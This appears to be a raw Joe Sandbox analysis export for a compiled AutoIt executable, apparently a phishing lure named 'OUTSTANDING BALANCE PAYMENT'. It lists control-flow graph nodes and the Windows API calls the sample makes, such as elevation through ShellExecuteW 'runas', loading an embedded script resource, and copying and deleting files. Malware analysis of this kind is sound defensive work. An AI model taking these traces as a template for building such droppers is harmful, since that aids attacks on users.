94738->94741 94742 2a1c9d _free 47 API calls 94738->94742 94739->94738 94740 2a1c9d _free 47 API calls 94739->94740 94740->94738 94742->94741 94743 2f9c06 94754 29d3be 94743->94754 94745 2f9c1c 94746 2f9c91 Mailbox 94745->94746 94763 281caa 49 API calls 94745->94763 94749 293200 331 API calls 94746->94749 94748 2f9c71 94751 2f9cc5 94748->94751 94764 2cb171 48 API calls 94748->94764 94749->94751 94753 
2fa7ab Mailbox 94751->94753 94765 2ccc5c 86 API calls 4 library calls 94751->94765 94755 29d3ca 94754->94755 94756 29d3dc 94754->94756 94766 28dcae 50 API calls Mailbox 94755->94766 94758 29d40b 94756->94758 94759 29d3e2 94756->94759 94767 28dcae 50 API calls Mailbox 94758->94767 94761 29f4ea 48 API calls 94759->94761 94760 29d3d4 94760->94745 94761->94760 94763->94748 94764->94746 94765->94753 94766->94760 94767->94760 94768 283742 94769 28374b 94768->94769 94770 2837c6 94769->94770 94771 2837c8 94769->94771 94772 283769 94769->94772 94773 2837ab DefWindowProcW 94770->94773 94774 2837ce 94771->94774 94775 2f1e00 94771->94775 94776 28382c PostQuitMessage 94772->94776 94777 283776 94772->94777 94783 2837b9 94773->94783 94778 2837d3 94774->94778 94779 2837f6 SetTimer RegisterWindowMessageW 94774->94779 94823 282ff6 16 API calls 94775->94823 94776->94783 94781 2f1e88 94777->94781 94782 283781 94777->94782 94784 2837da KillTimer 94778->94784 94785 2f1da3 94778->94785 94779->94783 94787 28381f CreatePopupMenu 94779->94787 94838 2c4ddd 60 API calls _memset 94781->94838 94788 283789 94782->94788 94789 283836 94782->94789 94820 283847 Shell_NotifyIconW _memset 94784->94820 94791 2f1ddc MoveWindow 94785->94791 94792 2f1da8 94785->94792 94786 2f1e27 94824 29e312 331 API calls Mailbox 94786->94824 94787->94783 94795 2f1e6d 94788->94795 94796 283794 94788->94796 94813 29eb83 94789->94813 94791->94783 94799 2f1dac 94792->94799 94800 2f1dcb SetFocus 94792->94800 94795->94773 94837 2ba5f3 48 API calls 94795->94837 94802 28379f 94796->94802 94803 2f1e58 94796->94803 94797 2f1e9a 94797->94773 94797->94783 94799->94802 94804 2f1db5 94799->94804 94800->94783 94801 2837ed 94821 28390f DeleteObject DestroyWindow Mailbox 94801->94821 94802->94773 94825 283847 Shell_NotifyIconW _memset 94802->94825 94836 2c55bd 70 API calls _memset 94803->94836 94822 282ff6 16 API calls 94804->94822 94809 2f1e68 94809->94783 94811 2f1e4c 94826 284ffc 94811->94826 94814 29eb9a _memset 94813->94814 94815 
29ec1c 94813->94815 94839 2851af 94814->94839 94815->94783 94817 29ec05 KillTimer SetTimer 94817->94815 94818 29ebc1 94818->94817 94819 2f3c7a Shell_NotifyIconW 94818->94819 94819->94817 94820->94801 94821->94783 94822->94783 94823->94786 94824->94802 94825->94811 94827 285027 _memset 94826->94827 94861 284c30 94827->94861 94830 2850ac 94832 2850ca Shell_NotifyIconW 94830->94832 94833 2f3d28 Shell_NotifyIconW 94830->94833 94834 2851af 50 API calls 94832->94834 94835 2850df 94834->94835 94835->94770 94836->94809 94837->94770 94838->94797 94840 2851cb 94839->94840 94859 2852a2 Mailbox 94839->94859 94841 286b0f 48 API calls 94840->94841 94842 2851d9 94841->94842 94843 2f3ca1 LoadStringW 94842->94843 94844 2851e6 94842->94844 94847 2f3cbb 94843->94847 94845 286a63 48 API calls 94844->94845 94846 2851fb 94845->94846 94846->94847 94848 28520c 94846->94848 94849 28510d 48 API calls 94847->94849 94850 285216 94848->94850 94851 2852a7 94848->94851 94854 2f3cc5 94849->94854 94853 28510d 48 API calls 94850->94853 94852 286eed 48 API calls 94851->94852 94860 285220 _memset _wcscpy 94852->94860 94853->94860 94855 28518c 48 API calls 94854->94855 94854->94860 94856 2f3ce7 94855->94856 94858 28518c 48 API calls 94856->94858 94857 285288 Shell_NotifyIconW 94857->94859 94858->94860 94859->94818 94860->94857 94862 2f3c33 94861->94862 94863 284c44 94861->94863 94862->94863 94864 2f3c3c DestroyIcon 94862->94864 94863->94830 94865 2c5819 61 API calls _W_store_winword 94863->94865 94864->94863 94865->94830 94866 2f19dd 94871 284a30 94866->94871 94868 2f19f1 94891 2a0f0a 52 API calls __cinit 94868->94891 94870 2f19fb 94872 284a40 __ftell_nolock 94871->94872 94873 28d7f7 48 API calls 94872->94873 94874 284af6 94873->94874 94892 285374 94874->94892 94876 284aff 94899 28363c 94876->94899 94879 28518c 48 API calls 94880 284b18 94879->94880 94905 2864cf 94880->94905 94883 28d7f7 48 API calls 94884 284b32 94883->94884 94911 2849fb 94884->94911 94886 284b43 Mailbox 94886->94868 94887 284b3d 
_wcscat Mailbox __NMSG_WRITE 94887->94886 94888 28ce19 48 API calls 94887->94888 94889 2864cf 48 API calls 94887->94889 94890 2861a6 48 API calls 94887->94890 94888->94887 94889->94887 94890->94887 94891->94870 94925 2af8a0 94892->94925 94895 28ce19 48 API calls 94896 2853a7 94895->94896 94927 28660f 94896->94927 94898 2853b1 Mailbox 94898->94876 94900 283649 __ftell_nolock 94899->94900 94938 28366c GetFullPathNameW 94900->94938 94902 28365a 94903 286a63 48 API calls 94902->94903 94904 283669 94903->94904 94904->94879 94907 28651b 94905->94907 94910 2864dd ___crtGetEnvironmentStringsW 94905->94910 94906 29f4ea 48 API calls 94908 284b29 94906->94908 94909 29f4ea 48 API calls 94907->94909 94908->94883 94909->94910 94910->94906 94940 28bcce 94911->94940 94914 2f41cc RegQueryValueExW 94916 2f4246 RegCloseKey 94914->94916 94917 2f41e5 94914->94917 94915 284a2b 94915->94887 94918 29f4ea 48 API calls 94917->94918 94919 2f41fe 94918->94919 94920 2847b7 48 API calls 94919->94920 94921 2f4208 RegQueryValueExW 94920->94921 94922 2f423b 94921->94922 94923 2f4224 94921->94923 94922->94916 94924 286a63 48 API calls 94923->94924 94924->94922 94926 285381 GetModuleFileNameW 94925->94926 94926->94895 94928 2af8a0 __ftell_nolock 94927->94928 94929 28661c GetFullPathNameW 94928->94929 94930 286a63 48 API calls 94929->94930 94931 286643 94930->94931 94934 286571 94931->94934 94935 28657f 94934->94935 94936 28b18b 48 API calls 94935->94936 94937 28658f 94936->94937 94937->94898 94939 28368a 94938->94939 94939->94902 94941 28bce8 94940->94941 94942 284a0a RegOpenKeyExW 94940->94942 94943 29f4ea 48 API calls 94941->94943 94942->94914 94942->94915 94944 28bcf2 94943->94944 94945 29ee75 48 API calls 94944->94945 94945->94942 94946 2f197b 94951 29dd94 94946->94951 94950 2f198a 94952 29f4ea 48 API calls 94951->94952 94953 29dd9c 94952->94953 94954 29ddb0 94953->94954 94959 29df3d 94953->94959 94958 2a0f0a 52 API calls __cinit 94954->94958 94958->94950 94960 29dda8 94959->94960 94961 29df46 
94959->94961 94963 29ddc0 94960->94963 94991 2a0f0a 52 API calls __cinit 94961->94991 94964 28d7f7 48 API calls 94963->94964 94965 29ddd7 GetVersionExW 94964->94965 94966 286a63 48 API calls 94965->94966 94967 29de1a 94966->94967 94992 29dfb4 94967->94992 94970 286571 48 API calls 94977 29de2e 94970->94977 94972 2f24c8 94974 29dea4 GetCurrentProcess 95005 29df5f LoadLibraryA GetProcAddress 94974->95005 94975 29df31 GetSystemInfo 94979 29df0e 94975->94979 94976 29dee3 94999 29e00c 94976->94999 94977->94972 94996 29df77 94977->94996 94982 29df1c FreeLibrary 94979->94982 94983 29df21 94979->94983 94982->94983 94983->94954 94984 29debb 94984->94975 94984->94976 94985 29df29 GetSystemInfo 94987 29df03 94985->94987 94986 29def9 95002 29dff4 94986->95002 94987->94979 94990 29df09 FreeLibrary 94987->94990 94990->94979 94991->94960 94993 29dfbd 94992->94993 94994 28b18b 48 API calls 94993->94994 94995 29de22 94994->94995 94995->94970 95006 29df89 94996->95006 95010 29e01e 94999->95010 95003 29e00c 2 API calls 95002->95003 95004 29df01 GetNativeSystemInfo 95003->95004 95004->94987 95005->94984 95007 29dea0 95006->95007 95008 29df92 LoadLibraryA 95006->95008 95007->94974 95007->94984 95008->95007 95009 29dfa3 GetProcAddress 95008->95009 95009->95007 95011 29def1 95010->95011 95012 29e027 LoadLibraryA 95010->95012 95011->94985 95011->94986 95012->95011 95013 29e038 GetProcAddress 95012->95013 95013->95011 95014 2f19ba 95019 29c75a 95014->95019 95018 2f19c9 95020 28d7f7 48 API calls 95019->95020 95021 29c7c8 95020->95021 95027 29d26c 95021->95027 95023 29c865 95025 29c881 95023->95025 95030 29d1fa 48 API calls ___crtGetEnvironmentStringsW 95023->95030 95026 2a0f0a 52 API calls __cinit 95025->95026 95026->95018 95031 29d298 95027->95031 95030->95023 95032 29d28b 95031->95032 95033 29d2a5 95031->95033 95032->95023 95033->95032 95034 29d2ac RegOpenKeyExW 95033->95034 95034->95032 95035 29d2c6 RegQueryValueExW 95034->95035 95036 29d2fc RegCloseKey 95035->95036 95037 29d2e7 
95035->95037 95036->95032 95037->95036 95038 2f8eb8 95042 2ca635 95038->95042 95040 2f8ec3 95041 2ca635 84 API calls 95040->95041 95041->95040 95048 2ca66f 95042->95048 95050 2ca642 95042->95050 95043 2ca671 95054 29ec4e 81 API calls 95043->95054 95044 2ca676 95046 28936c 81 API calls 95044->95046 95047 2ca67d 95046->95047 95049 28510d 48 API calls 95047->95049 95048->95040 95049->95048 95050->95043 95050->95044 95050->95048 95051 2ca669 95050->95051 95053 294525 61 API calls ___crtGetEnvironmentStringsW 95051->95053 95053->95048 95054->95044 95055 2a5dfd 95056 2a5e09 __getstream 95055->95056 95092 2a7eeb GetStartupInfoW 95056->95092 95058 2a5e0e 95094 2a9ca7 GetProcessHeap 95058->95094 95060 2a5e66 95061 2a5e71 95060->95061 95179 2a5f4d 47 API calls 3 library calls 95060->95179 95095 2a7b47 95061->95095 95064 2a5e77 95065 2a5e82 __RTC_Initialize 95064->95065 95180 2a5f4d 47 API calls 3 library calls 95064->95180 95116 2aacb3 95065->95116 95068 2a5e91 95069 2a5e9d GetCommandLineW 95068->95069 95181 2a5f4d 47 API calls 3 library calls 95068->95181 95135 2b2e7d GetEnvironmentStringsW 95069->95135 95072 2a5e9c 95072->95069 95076 2a5ec2 95148 2b2cb4 95076->95148 95079 2a5ec8 95080 2a5ed3 95079->95080 95183 2a115b 47 API calls 3 library calls 95079->95183 95162 2a1195 95080->95162 95083 2a5edb 95084 2a5ee6 __wwincmdln 95083->95084 95184 2a115b 47 API calls 3 library calls 95083->95184 95166 283a0f 95084->95166 95087 2a5efa 95088 2a5f09 95087->95088 95185 2a13f1 47 API calls _doexit 95087->95185 95186 2a1186 47 API calls _doexit 95088->95186 95091 2a5f0e __getstream 95093 2a7f01 95092->95093 95093->95058 95094->95060 95187 2a123a 30 API calls 2 library calls 95095->95187 95097 2a7b4c 95188 2a7e23 InitializeCriticalSectionAndSpinCount 95097->95188 95099 2a7b51 95100 2a7b55 95099->95100 95190 2a7e6d TlsAlloc 95099->95190 95189 2a7bbd 50 API calls 2 library calls 95100->95189 95103 2a7b5a 95103->95064 95104 2a7b67 95104->95100 95105 2a7b72 95104->95105 95191 2a6986 
95105->95191 95108 2a7bb4 95199 2a7bbd 50 API calls 2 library calls 95108->95199 95111 2a7b93 95111->95108 95113 2a7b99 95111->95113 95112 2a7bb9 95112->95064 95198 2a7a94 47 API calls 4 library calls 95113->95198 95115 2a7ba1 GetCurrentThreadId 95115->95064 95117 2aacbf __getstream 95116->95117 95118 2a7cf4 __lock 47 API calls 95117->95118 95119 2aacc6 95118->95119 95120 2a6986 __calloc_crt 47 API calls 95119->95120 95121 2aacd7 95120->95121 95122 2aad42 GetStartupInfoW 95121->95122 95124 2aace2 @_EH4_CallFilterFunc@8 __getstream 95121->95124 95130 2aae80 95122->95130 95132 2aad57 95122->95132 95123 2aaf44 95208 2aaf58 LeaveCriticalSection _doexit 95123->95208 95124->95068 95126 2aaec9 GetStdHandle 95126->95130 95127 2a6986 __calloc_crt 47 API calls 95127->95132 95128 2aaedb GetFileType 95128->95130 95129 2aada5 95129->95130 95133 2aadd7 GetFileType 95129->95133 95134 2aade5 InitializeCriticalSectionAndSpinCount 95129->95134 95130->95123 95130->95126 95130->95128 95131 2aaf08 InitializeCriticalSectionAndSpinCount 95130->95131 95131->95130 95132->95127 95132->95129 95132->95130 95133->95129 95133->95134 95134->95129 95136 2b2e8e 95135->95136 95137 2a5ead 95135->95137 95209 2a69d0 47 API calls _W_store_winword 95136->95209 95142 2b2a7b GetModuleFileNameW 95137->95142 95140 2b2eca FreeEnvironmentStringsW 95140->95137 95141 2b2eb4 ___crtGetEnvironmentStringsW 95141->95140 95143 2b2aaf _wparse_cmdline 95142->95143 95144 2a5eb7 95143->95144 95145 2b2ae9 95143->95145 95144->95076 95182 2a115b 47 API calls 3 library calls 95144->95182 95210 2a69d0 47 API calls _W_store_winword 95145->95210 95147 2b2aef _wparse_cmdline 95147->95144 95149 2b2ccd __NMSG_WRITE 95148->95149 95153 2b2cc5 95148->95153 95150 2a6986 __calloc_crt 47 API calls 95149->95150 95158 2b2cf6 __NMSG_WRITE 95150->95158 95151 2b2d4d 95152 2a1c9d _free 47 API calls 95151->95152 95152->95153 95153->95079 95154 2a6986 __calloc_crt 47 API calls 95154->95158 95155 2b2d72 95157 2a1c9d _free 47 API calls 
95155->95157 95157->95153 95158->95151 95158->95153 95158->95154 95158->95155 95159 2b2d89 95158->95159 95211 2b2567 47 API calls 2 library calls 95158->95211 95212 2a6e20 IsProcessorFeaturePresent 95159->95212 95161 2b2d95 95161->95079 95163 2a11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95162->95163 95165 2a11e0 __IsNonwritableInCurrentImage 95163->95165 95227 2a0f0a 52 API calls __cinit 95163->95227 95165->95083 95167 2f1ebf 95166->95167 95168 283a29 95166->95168 95169 283a63 IsThemeActive 95168->95169 95228 2a1405 95169->95228 95173 283a8f 95240 283adb SystemParametersInfoW SystemParametersInfoW 95173->95240 95175 283a9b 95241 283d19 95175->95241 95177 283aa3 SystemParametersInfoW 95178 283ac8 95177->95178 95178->95087 95179->95061 95180->95065 95181->95072 95185->95088 95186->95091 95187->95097 95188->95099 95189->95103 95190->95104 95194 2a698d 95191->95194 95193 2a69ca 95193->95108 95197 2a7ec9 TlsSetValue 95193->95197 95194->95193 95195 2a69ab Sleep 95194->95195 95200 2b30aa 95194->95200 95196 2a69c2 95195->95196 95196->95193 95196->95194 95197->95111 95198->95115 95199->95112 95201 2b30b5 95200->95201 95205 2b30d0 __calloc_impl 95200->95205 95202 2b30c1 95201->95202 95201->95205 95207 2a7c0e 47 API calls __getptd_noexit 95202->95207 95203 2b30e0 HeapAlloc 95203->95205 95206 2b30c6 95203->95206 95205->95203 95205->95206 95206->95194 95207->95206 95208->95124 95209->95141 95210->95147 95211->95158 95213 2a6e2b 95212->95213 95218 2a6cb5 95213->95218 95217 2a6e46 95217->95161 95219 2a6ccf _memset __call_reportfault 95218->95219 95220 2a6cef IsDebuggerPresent 95219->95220 95226 2a81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95220->95226 95222 2a6db3 __call_reportfault 95223 2aa70c __cftoe2_l 6 API calls 95222->95223 95224 2a6dd6 95223->95224 95225 2a8197 GetCurrentProcess TerminateProcess 95224->95225 95225->95217 95226->95222 95227->95165 95229 2a7cf4 __lock 47 API calls 95228->95229 95230 2a1410 95229->95230 95293 

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00283AA3,?), ref: 00283D45
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00283AA3,?), ref: 00283D57
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00341148,00341130,?,?,?,?,00283AA3,?), ref: 00283DC8
                                                                    • Part of subcall function 00286430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00283DEE,00341148,?,?,?,?,?,00283AA3,?), ref: 00286471
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00283AA3,?), ref: 00283E48
                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003328F4,00000010), ref: 002F1CCE
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00341148,?,?,?,?,?,00283AA3,?), ref: 002F1D06
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0031DAB4,00341148,?,?,?,?,?,00283AA3,?), ref: 002F1D89
                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00283AA3), ref: 002F1D90
                                                                    • Part of subcall function 00283E6E: GetSysColorBrush.USER32(0000000F), ref: 00283E79
                                                                    • Part of subcall function 00283E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00283E88
                                                                    • Part of subcall function 00283E6E: LoadIconW.USER32(00000063), ref: 00283E9E
                                                                    • Part of subcall function 00283E6E: LoadIconW.USER32(000000A4), ref: 00283EB0
                                                                    • Part of subcall function 00283E6E: LoadIconW.USER32(000000A2), ref: 00283EC2
                                                                    • Part of subcall function 00283E6E: RegisterClassExW.USER32(?), ref: 00283F30
                                                                    • Part of subcall function 002836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002836E6
                                                                    • Part of subcall function 002836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00283707
                                                                    • Part of subcall function 002836B8: ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 0028371B
                                                                    • Part of subcall function 002836B8: ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 00283724
                                                                    • Part of subcall function 00284FFC: _memset.LIBCMT ref: 00285022
                                                                    • Part of subcall function 00284FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002850CB
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                  • String ID: ()3$This is a third-party compiled AutoIt script.$runas

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0029DDEC
                                                                  • GetCurrentProcess.KERNEL32(00000000,0031DC38,?,?), ref: 0029DEAC
                                                                  • GetNativeSystemInfo.KERNELBASE(?,0031DC38,?,?), ref: 0029DF01
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0029DF0C
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0029DF1F
                                                                  • GetSystemInfo.KERNEL32(?,0031DC38,?,?), ref: 0029DF29
                                                                  • GetSystemInfo.KERNEL32(?,0031DC38,?,?), ref: 0029DF35
                                                                  Similarity
                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                  • String ID:

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0028449E,?,?,00000000,00000001), ref: 0028407B
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0028449E,?,?,00000000,00000001), ref: 00284092
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,0028449E,?,?,00000000,00000001,?,?,?,?,?,?,002841FB), ref: 002F4F1A
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,0028449E,?,?,00000000,00000001,?,?,?,?,?,?,002841FB), ref: 002F4F2F
                                                                  • LockResource.KERNEL32(0028449E,?,?,0028449E,?,?,00000000,00000001,?,?,?,?,?,?,002841FB,00000000), ref: 002F4F42
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID: @$ 4$ 4$ 4
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,002F2F49), ref: 002C6CB9
                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 002C6CCA
                                                                  • FindClose.KERNEL32(00000000), ref: 002C6CDA
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: 4
                                                                  • API String ID: 3964851224-1342260363
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028E959
                                                                  • timeGetTime.WINMM ref: 0028EBFA
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0028ED2E
                                                                  • TranslateMessage.USER32(?), ref: 0028ED3F
                                                                  • DispatchMessageW.USER32(?), ref: 0028ED4A
                                                                  • LockWindowUpdate.USER32(00000000), ref: 0028ED79
                                                                  • DestroyWindow.USER32 ref: 0028ED85
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028ED9F
                                                                  • Sleep.KERNEL32(0000000A), ref: 002F5270
                                                                  • TranslateMessage.USER32(?), ref: 002F59F7
                                                                  • DispatchMessageW.USER32(?), ref: 002F5A05
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002F5A19
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 2641332412-570651680
                                                                  APIs
                                                                  • ___createFile.LIBCMT ref: 002B5EC3
                                                                  • ___createFile.LIBCMT ref: 002B5F04
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002B5F2D
                                                                  • __dosmaperr.LIBCMT ref: 002B5F34
                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 002B5F47
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002B5F6A
                                                                  • __dosmaperr.LIBCMT ref: 002B5F73
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002B5F7C
                                                                  • __set_osfhnd.LIBCMT ref: 002B5FAC
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B6016
                                                                  • __close_nolock.LIBCMT ref: 002B603C
                                                                  • __chsize_nolock.LIBCMT ref: 002B606C
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B607E
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B6176
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B618B
                                                                  • __close_nolock.LIBCMT ref: 002B61EB
                                                                    • Part of subcall function 002AEA9C: CloseHandle.KERNELBASE(00000000,0032EEF4,00000000,?,002B6041,0032EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002AEAEC
                                                                    • Part of subcall function 002AEA9C: GetLastError.KERNEL32(?,002B6041,0032EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002AEAF6
                                                                    • Part of subcall function 002AEA9C: __free_osfhnd.LIBCMT ref: 002AEB03
                                                                    • Part of subcall function 002AEA9C: __dosmaperr.LIBCMT ref: 002AEB25
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B620D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002B6342
                                                                  • ___createFile.LIBCMT ref: 002B6361
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002B636E
                                                                  • __dosmaperr.LIBCMT ref: 002B6375
                                                                  • __free_osfhnd.LIBCMT ref: 002B6395
                                                                  • __invoke_watson.LIBCMT ref: 002B63C3
                                                                  • __wsopen_helper.LIBCMT ref: 002B63DD
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                  • String ID: @
                                                                  • API String ID: 3896587723-2766056989

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _wcscpy.LIBCMT ref: 002CFA96
                                                                  • _wcschr.LIBCMT ref: 002CFAA4
                                                                  • _wcscpy.LIBCMT ref: 002CFABB
                                                                  • _wcscat.LIBCMT ref: 002CFACA
                                                                  • _wcscat.LIBCMT ref: 002CFAE8
                                                                  • _wcscpy.LIBCMT ref: 002CFB09
                                                                  • __wsplitpath.LIBCMT ref: 002CFBE6
                                                                  • _wcscpy.LIBCMT ref: 002CFC0B
                                                                  • _wcscpy.LIBCMT ref: 002CFC1D
                                                                  • _wcscpy.LIBCMT ref: 002CFC32
                                                                  • _wcscat.LIBCMT ref: 002CFC47
                                                                  • _wcscat.LIBCMT ref: 002CFC59
                                                                  • _wcscat.LIBCMT ref: 002CFC6E
                                                                    • Part of subcall function 002CBFA4: _wcscmp.LIBCMT ref: 002CC03E
                                                                    • Part of subcall function 002CBFA4: __wsplitpath.LIBCMT ref: 002CC083
                                                                    • Part of subcall function 002CBFA4: _wcscpy.LIBCMT ref: 002CC096
                                                                    • Part of subcall function 002CBFA4: _wcscat.LIBCMT ref: 002CC0A9
                                                                    • Part of subcall function 002CBFA4: __wsplitpath.LIBCMT ref: 002CC0CE
                                                                    • Part of subcall function 002CBFA4: _wcscat.LIBCMT ref: 002CC0E4
                                                                    • Part of subcall function 002CBFA4: _wcscat.LIBCMT ref: 002CC0F7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t23
                                                                  • API String ID: 2955681530-867710975

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 002CBDB4: __time64.LIBCMT ref: 002CBDBE
                                                                    • Part of subcall function 00284517: _fseek.LIBCMT ref: 0028452F
                                                                  • __wsplitpath.LIBCMT ref: 002CC083
                                                                    • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
                                                                  • _wcscpy.LIBCMT ref: 002CC096
                                                                  • _wcscat.LIBCMT ref: 002CC0A9
                                                                  • __wsplitpath.LIBCMT ref: 002CC0CE
                                                                  • _wcscat.LIBCMT ref: 002CC0E4
                                                                  • _wcscat.LIBCMT ref: 002CC0F7
                                                                  • _wcscmp.LIBCMT ref: 002CC03E
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC65D
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC670
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002CC2A1
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002CC338
                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002CC34E
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002CC35F
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002CC371
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                  • String ID: p1#v`K$v
                                                                  • API String ID: 2378138488-1068180069

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00283F86
                                                                  • RegisterClassExW.USER32(00000030), ref: 00283FB0
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00283FC1
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00283FDE
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00283FEE
                                                                  • LoadIconW.USER32(000000A9), ref: 00284004
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00284013
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 002837B3
                                                                  • KillTimer.USER32(?,00000001), ref: 002837DD
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00283800
